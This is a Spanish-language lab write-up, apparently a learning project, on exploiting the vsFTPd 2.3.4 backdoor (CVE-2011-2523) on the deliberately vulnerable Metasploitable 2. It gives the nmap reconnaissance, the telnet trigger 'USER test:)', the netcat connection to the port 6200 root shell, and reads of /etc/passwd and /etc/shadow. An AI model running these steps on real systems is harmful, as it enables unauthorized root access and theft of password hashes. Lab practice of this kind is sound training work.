
Proyecto: explotación de puerta trasera de vsFTPd 2.3.4 (CVE-2011-2523) en Metasploitable 2
Este proyecto demuestra un flujo de trabajo de pruebas de penetración contra una máquina deliberadamente vulnerable, Metasploitable 2. El objetivo fue identificar, explotar y analizar una vulnerabilidad conocida en el servicio FTP, logrando finalmente acceso a nivel root y evaluando el impacto en la seguridad.
192.168.56.0/24)Se verificó el sistema objetivo y su configuración de red:
whoami
hostname
ifconfig

Se confirmó la conectividad de red entre atacante y objetivo:
ping 192.168.56.101

vsFTPd 2.3.4)Se realizó descubrimiento de hosts:
nmap -sn 192.168.56.0/24
Se identificaron hosts activos en la red.

nmap 192.168.56.101
Se descubrieron múltiples puertos abiertos, incluyendo:

nmap -sV 192.168.56.101
Se identificó el servicio FTP en ejecución:
vsFTPd 2.3.4
Un escaneo completo de servicios y basado en scripts se incluye en los archivos de soporte: Salida del escaneo Nmap.

El servicio FTP estaba ejecutando una versión vulnerable conocida:
vsFTPd 2.3.4
Esta versión de vsFTPd fue distribuida con una puerta trasera maliciosa que se activa cuando se utiliza un nombre de usuario que contiene :) durante la autenticación.
Al activarse, el servicio abre una shell vinculada en el puerto 6200, permitiendo acceso remoto no autorizado.
Se activó la puerta trasera usando Telnet:
telnet 192.168.56.101 21
USER test:)
PASS test

Se conectó a la puerta trasera usando Netcat:
nc 192.168.56.101 6200

whoami
root
Acceso root obtenido exitosamente

Después de obtener acceso root, se realizó una enumeración básica del sistema:
cat /etc/passwd
cat /etc/shadow
/etc/shadow

Este laboratorio demuestra cómo un solo servicio vulnerable puede llevar a un compromiso total del sistema. Destaca la importancia de una configuración adecuada de servicios, la gestión de parches y minimizar las superficies de ataque expuestas.
Esta fue mi primera vez explotando manualmente una puerta trasera del mundo real. Aprendí cómo una sola cadena de nombre de usuario maliciosa (:)) puede desencadenar acceso a nivel root, lo que reforzó por qué la enumeración de servicios y la detección de versiones son tan importantes en el reconocimiento. También me familiaricé más con comandos básicos de post-explotación en Linux, como leer /etc/shadow y entender cómo se ven realmente las credenciales hash.
Este fue un entorno de laboratorio controlado utilizando Metasploitable 2, una máquina intencionalmente vulnerable. La puerta trasera de vsFTPd 2.3.4 es un CVE conocido (CVE-2011-2523) de 2011, por lo que esto no refleja un compromiso moderno del mundo real. En una evaluación real, se necesitarían pasos adicionales como evasión, omisión de registros o pivoteo. Este proyecto se centró en comprender los mecanismos básicos de explotación, no en una prueba de penetración completa.